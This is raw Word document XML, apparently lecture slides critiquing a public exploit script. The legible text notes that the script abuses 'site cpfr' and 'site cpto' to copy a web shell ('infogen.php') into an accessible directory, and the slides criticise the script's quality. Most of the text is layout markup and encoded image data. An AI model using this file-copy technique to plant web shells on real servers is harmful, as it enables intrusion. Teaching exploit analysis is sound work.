                        <v:textbox inset="0,0,0,0">
                          <w:txbxContent>
                            <w:p w14:paraId="1B0040CD" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                              <w:r>
                                <w:rPr>
                                  <w:sz w:val="40"/>
                                </w:rPr>
                                <w:t xml:space="preserve">+ </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </v:textbox>
                      </v:rect>
                      <v:rect id="Rectangle 91743" o:spid="_x0000_s1040" style="position:absolute;left:34004;width:13808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7o1yAAAAN4AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pa8JA&#10;FMTvQr/D8gredGMtrUldRdSSHP1TsL09sq9JaPZtyK4m+um7hYLHYWZ+w8yXvanFhVpXWVYwGUcg&#10;iHOrKy4UfBzfRzMQziNrrC2Tgis5WC4eBnNMtO14T5eDL0SAsEtQQel9k0jp8pIMurFtiIP3bVuD&#10;Psi2kLrFLsBNLZ+i6EUarDgslNjQuqT853A2CtJZs/rM7K0r6u1Xetqd4s0x9koNH/vVGwhPvb+H&#10;/9uZVhBPXp+n8HcnXAG5+AUAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAA&#10;AAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUB&#10;AAALAAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBVf7o1yAAAAN4A&#10;AAAPAAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA/AIAAAAA&#10;" filled="f" stroked="f">
                        <v:textbox inset="0,0,0,0">
                          <w:txbxContent>
                            <w:p w14:paraId="1073421F" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                              <w:r>
                                <w:rPr>
                                  <w:sz w:val="42"/>
                                </w:rPr>
                                <w:t xml:space="preserve">directory </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </v:textbox>
                      </v:rect>
                      <v:rect id="Rectangle 91744" o:spid="_x0000_s1041" style="position:absolute;left:44386;width:2818;height:2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iJByAAAAN4AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pa8JA&#10;FMTvBb/D8oTe6sYirYlugtgWPdY/oN4e2WcSzL4N2a1J/fRuoeBxmJnfMPOsN7W4UusqywrGowgE&#10;cW51xYWC/e7rZQrCeWSNtWVS8EsOsnTwNMdE2443dN36QgQIuwQVlN43iZQuL8mgG9mGOHhn2xr0&#10;QbaF1C12AW5q+RpFb9JgxWGhxIaWJeWX7Y9RsJo2i+Pa3rqi/jytDt+H+GMXe6Weh/1iBsJT7x/h&#10;//ZaK4jH75MJ/N0JV0CmdwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAA&#10;AAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUB&#10;AAALAAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDaliJByAAAAN4A&#10;AAAPAAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA/AIAAAAA&#10;" filled="f" stroked="f">
                        <v:textbox inset="0,0,0,0">
                          <w:txbxContent>
                            <w:p w14:paraId="45DB5605" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                              <w:r>
                                <w:rPr>
                                  <w:sz w:val="40"/>
                                </w:rPr>
                                <w:t xml:space="preserve">+ </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </v:textbox>
                      </v:rect>
                      <v:rect id="Rectangle 91745" o:spid="_x0000_s1042" style="position:absolute;left:46863;width:18622;height:2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ofayAAAAN4AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pa8JA&#10;FMTvQr/D8gredGOxrUldRdSSHP1TsL09sq9JaPZtyK4m+um7hYLHYWZ+w8yXvanFhVpXWVYwGUcg&#10;iHOrKy4UfBzfRzMQziNrrC2Tgis5WC4eBnNMtO14T5eDL0SAsEtQQel9k0jp8pIMurFtiIP3bVuD&#10;Psi2kLrFLsBNLZ+i6EUarDgslNjQuqT853A2CtJZs/rM7K0r6u1Xetqd4s0x9koNH/vVGwhPvb+H&#10;/9uZVhBPXqfP8HcnXAG5+AUAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAA&#10;AAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUB&#10;AAALAAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQC12ofayAAAAN4A&#10;AAAPAAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA/AIAAAAA&#10;" filled="f" stroked="f">
                        <v:textbox inset="0,0,0,0">
                          <w:txbxContent>
                            <w:p w14:paraId="64506769" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                              <w:r>
                                <w:rPr>
                                  <w:sz w:val="40"/>
                                </w:rPr>
                                <w:t>'infogen.php')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</w:tbl>
    <w:p w14:paraId="5678080B" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="1"/>
        <w:ind w:left="556" w:hanging="10"/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0" wp14:anchorId="21BDA169" wp14:editId="02E5ECB3">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1289685</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>879521</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="857250" cy="161925"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="100477" name="Picture 100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7" name="Picture 100477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0" wp14:anchorId="49B6414E" wp14:editId="6FF4229B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1032510</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1603421</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2124075" cy="104775"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="340759" name="Picture 3407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59" name="Picture 340759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0" wp14:anchorId="03E079EA" wp14:editId="55B1C52C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>4747260</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>4118022</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="47625" cy="9525"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="100554" name="Picture 100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4" name="Picture 100554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6"/>
        </w:rPr>
        <w:t>The use of site cpfr and site</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D97938" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:before="30" w:after="519" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1306" w:right="-495" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>cpto allow copying files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130C306A" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:before="13" w:after="1"/>
        <w:ind w:left="1611" w:hanging="1380"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="46"/>
        </w:rPr>
        <w:t>The script copies a web shell into an accessible directory!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AA0888" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:before="525" w:after="3" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="46" w:right="-495" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>Unfortunately:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771621D2" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="3" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="586" w:right="-495" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>Numerous spelling errors. No exception handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271C5C05" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="196" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="586" w:right="-495" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>No command results shown.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0602E07F" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="5" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1636" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:t>This is bad code!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376B0FD9" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="4"/>
        <w:ind w:left="31" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="72"/>
        </w:rPr>
        <w:t>Remember: this is another person's code!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214BDC03" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="4" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The script might not even work!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7644334E" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-84" w:right="-1305"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FE6078C" wp14:editId="56BC422D">
            <wp:extent cx="11087100" cy="4295775"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="340763" name="Picture 3407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63" name="Picture 340763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3DD5" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="3"/>
        <w:ind w:left="16" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="70"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>This is why we need to be able to understand the exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605DF004" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-84" w:right="-130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F439AA8" wp14:editId="2F90DE7F">
                <wp:extent cx="11087100" cy="4733925"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="334117" name="Group 334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7100" cy="4733925"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="11087100" cy="4733925"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="340765" name="Picture 340765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0"/>
                            <a:ext cx="11087100" cy="4657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709" name="Rectangle 109709"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="790575" y="0"/>
                            <a:ext cx="848773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67C64" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                              <w:r>
                                <w:rPr>
                                  <w:sz w:val="54"/>
                                </w:rPr>
                                <w:t xml:space="preserve">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710" name="Rectangle 109710"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1428750" y="0"/>
                            <a:ext cx="1925574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40732" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                              <w:r>
                                <w:rPr>
                                  <w:sz w:val="52"/>
                                </w:rPr>
                                <w:t xml:space="preserve">eventually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711" name="Rectangle 109711"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2876550" y="0"/>
                            <a:ext cx="798100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A7C7C" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                              <w:r>
                                <w:rPr>
                                  <w:sz w:val="52"/>
                                </w:rPr>
                                <w:t>fails!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439AA8" id="Group 334117" o:spid="_x0000_s1043" style="width:873pt;height:372.75pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="110871,4733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LtmSXGAMAAHMKAAAOAAAAZHJzL2Uyb0RvYy54bWzkVl1v2yAUfZ+0&#10;/4B4b23HSexYTappXatJ0xqt2w8gGNtoNiAgX/v1u+CPtE2jrn1YJ+0hDlzgcjjn3gsXl7umRhum&#10;DZdijqPzECMmqMy5KOf4x/frsxQjY4nISS0Fm+M9M/hy8f7dxVZlbCQrWedMI3AiTLZVc1xZq7Ig&#10;MLRiDTHnUjEBg4XUDbHQ1WWQa7IF700djMJwGmylzpWWlBkD1qt2EC+8/6Jg1N4WhWEW1XMM2Kz/&#10;av9duW+wuCBZqYmqOO1gkFegaAgXsOng6opYgtaaH7lqONXSyMKeU9kEsig4Zf4McJoofHSaGy3X&#10;yp+lzLalGmgCah/x9Gq39OtmqRHP5ziOx1GUYCRIAzr5rVFnA5K2qsxg7o1Wd2qpO0PZ9ty5d4Vu&#10;3D+cCO08vfuBXraziIIxisI0iUKQgcLgOInj2WjSKkArkOloIa0+Pbc06LcOHMIBkOI0g1/HGLSO&#10;GHs+smCVXWuGOyfNH/loiP65VmcgriKWr3jN7d4HKsjoQInNktOlbjv3yB+HyXTSkw9T3M4obq3A&#10;tlvqZru10A1c/4GrVc3VNa9rp4Frd6Ah0h9FyhPnbqPwStJ1w4Rt00qzGvBLYSquDEY6Y82KQZTo&#10;z3nUSmasZpZWbsMCNv4GqeaQkWwY8CgPwBxmA8FzMlySKWR06/xEyEwnSdKGzKA7yZQ29obJBrkG&#10;IAQgQDbJyOaL6SD1UzrmWhQeHoBywQ3Fx/ScQe+ItRfl111FFAMIzu1B4iicJeGsl9jRRURZM9TZ&#10;fUr5+UOCmVN0JbNwkkC0HKdYOk6TJG4TLE7DcJw6Pl9LFslq4ZgU0oVW68hZINd6bK5ld6udLyGR&#10;Dw1nWsl8D3WlkvrXLdwORS23cyy7FnYXBijlRjGqPwvg29XmvqH7xqpvaFt/lL6Ct3A+rK0suBf3&#10;sFuHC4T8i4pGALytmA8VBftLFI3GozSZgK9jSSMokpNk/GaajvqD/D+aRic0HcIbsvr5LAVFp5On&#10;NU1m6XAPvkGaxv+KpP7ShpeNL1HdK8w9ne73fVof3oqL3wAAAP//AwBQSwMECgAAAAAAAAAhAGM6&#10;72l30AAAd9AAABQAAABkcnMvbWVkaWEvaW1hZ2UxLmpwZ//Y/+AAEEpGSUYAAQEBAGAAYAAA/9sA&#10;QwADAgIDAgIDAwMDBAMDBAUIBQUEBAUKBwcGCAwKDAwLCgsLDQ4SEA0OEQ4LCxAWEBETFBUVFQwP&#10;FxgWFBgSFBUU/9sAQwEDBAQFBAUJBQUJFA0LDRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU&#10;FBQUFBQUFBQUFBQUFBQUFBQUFBQU/8AAEQgB6QSM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ULxH/aX/CPap/Y3ljV/ssv2LzvuefsPl7vb&#10;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&#10;ysRtkbhT+AB9H0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On7V91+0b&#10;cGy0T4IaV4ak07VLKa31DWtXnMVzpkpO1ZIv3gB+U5B8t8FenQV2X7LXwB0/9mf4JaB4EspxfXFo&#10;rT39+F2/aruQ7pZMemflXPIVVBr1m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